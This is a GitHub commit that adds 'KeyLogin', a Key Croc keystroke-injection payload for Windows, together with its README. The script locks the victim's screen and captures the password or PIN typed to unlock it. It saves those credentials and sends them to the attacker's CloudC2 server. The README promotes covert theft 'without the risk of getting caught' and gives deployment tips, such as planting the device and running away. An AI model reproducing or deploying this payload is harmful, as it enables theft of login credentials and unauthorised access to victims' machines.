hak5glytch
GitHub
commit
2da4c3f537
Binary file not shown.
|
After Width: | Height: | Size: 14 KiB |
Binary file not shown.
|
After Width: | Height: | Size: 24 KiB |
|
|
@ -0,0 +1,39 @@
|
|||
###############################KeyLogin#####################################
|
||||
# Version 1.1
|
||||
# OS: Windows
|
||||
# Author: 0iphor13
|
||||
# Discription: This extremely simple payload will lock the targets machine and will wait for it to insert the password.
|
||||
# Afterwards these will be exfiltrated to your CloudC2 instance. The most covert technique to get clear text credentials!
|
||||
#
|
||||
####################Defining Language,Trigger & Clean Up#####################
|
||||
MATCH \[ENTER\]
|
||||
|
||||
Q DELAY 2000
|
||||
export DUCKY_LANG=de
|
||||
Q DELAY 2000
|
||||
rm /root/loot/win-pass*
|
||||
|
||||
########################Locking User Machine################################
|
||||
|
||||
Q LOCK
|
||||
Q DELAY 500
|
||||
Q GUI l
|
||||
C2NOTIFY INFO 'Locked Users Machine!'
|
||||
Q DELAY 250
|
||||
Q DELETE
|
||||
Q DELAY 250
|
||||
Q UNLOCK
|
||||
WAIT_FOR_KEYBOARD_ACTIVITY 1
|
||||
#######Define until which point you want to intercept the keystrokes########
|
||||
SAVEKEYS /root/loot/win-pass.txt NEXT 4
|
||||
Q DELAY 2000
|
||||
while [ ! -f /root/loot/win-pass.txt ]; do sleep 2; done
|
||||
|
||||
#####################Exfiltrating Credentials###############################
|
||||
|
||||
C2EXFIL /root/loot/win-pass.txt
|
||||
Q DELAY 1000
|
||||
C2NOTIFY INFO 'User Credentials Received!'
|
||||
|
||||
#You may want to delete or disable to payload after execution to avoid endless logout processes
|
||||
#rm /root/udisk/payloads/KeyLogin.txt
|
||||
|
|
@ -0,0 +1,35 @@
|
|||
**Title: KeyLogin**
|
||||
|
||||
<p>Author: 0iphor13<br>
|
||||
OS: Windows<br>
|
||||
Version: 1.1<br>
|
||||
Requirements: CloudC2 Instance</p>
|
||||
|
||||
**What is KeyLogin?**
|
||||
#
|
||||
*When using a KeyCroc, what is your goal? Likely credentials or remote access.*
|
||||
*But many environments, especially within the banking sector are locked down.*
|
||||
*Taking advantage of available resources not only facilitates the use of payloads, it also enables long, undetected actions during an engagement.*
|
||||
*KeyLogin makes use of the Windows shortcut [Windows]+L to lock the system. Thanks to the KeyCrocs ability to sniff keystrokes, the password or pin can then be exfiltrated.*
|
||||
*This payload automates login stealing. It waites for the victim to press enter (to avoid logging wrong credentials), then locks the targets screen and sends the received credentials to your C2 instance.*
|
||||
*As there are different sorts of authentication types for windows systems, you can/need to configure until which point you want to intercept theses keystrokes. Until ENTER is pressed? Until a certain lenght was typed? It's up to you!*
|
||||
#
|
||||
There you go, login credentials, exfiltrated in an automated manner, without the risk of getting caught.
|
||||
|
||||
**Instruction:**
|
||||
|
||||
- Connect KeyCroc to C2
|
||||
- Configure payload language and DELAYs
|
||||
- Plugin KeyCroc & run away (pro tip: In the morning or after lunch your chances to get a good result are much higher)
|
||||
- You might want to disable to payload after the first success to avoid locking out the user!
|
||||
|
||||
KeyCroc will Notify you of the current attack state
|
||||
|
||||
|
||||
|
||||
KeyCroc will save the inserted credentials into a seperate file for you
|
||||
|
||||
|
||||
|
||||
Credit for support:
|
||||
- Korben
|
||||
Loading…
Reference in New Issue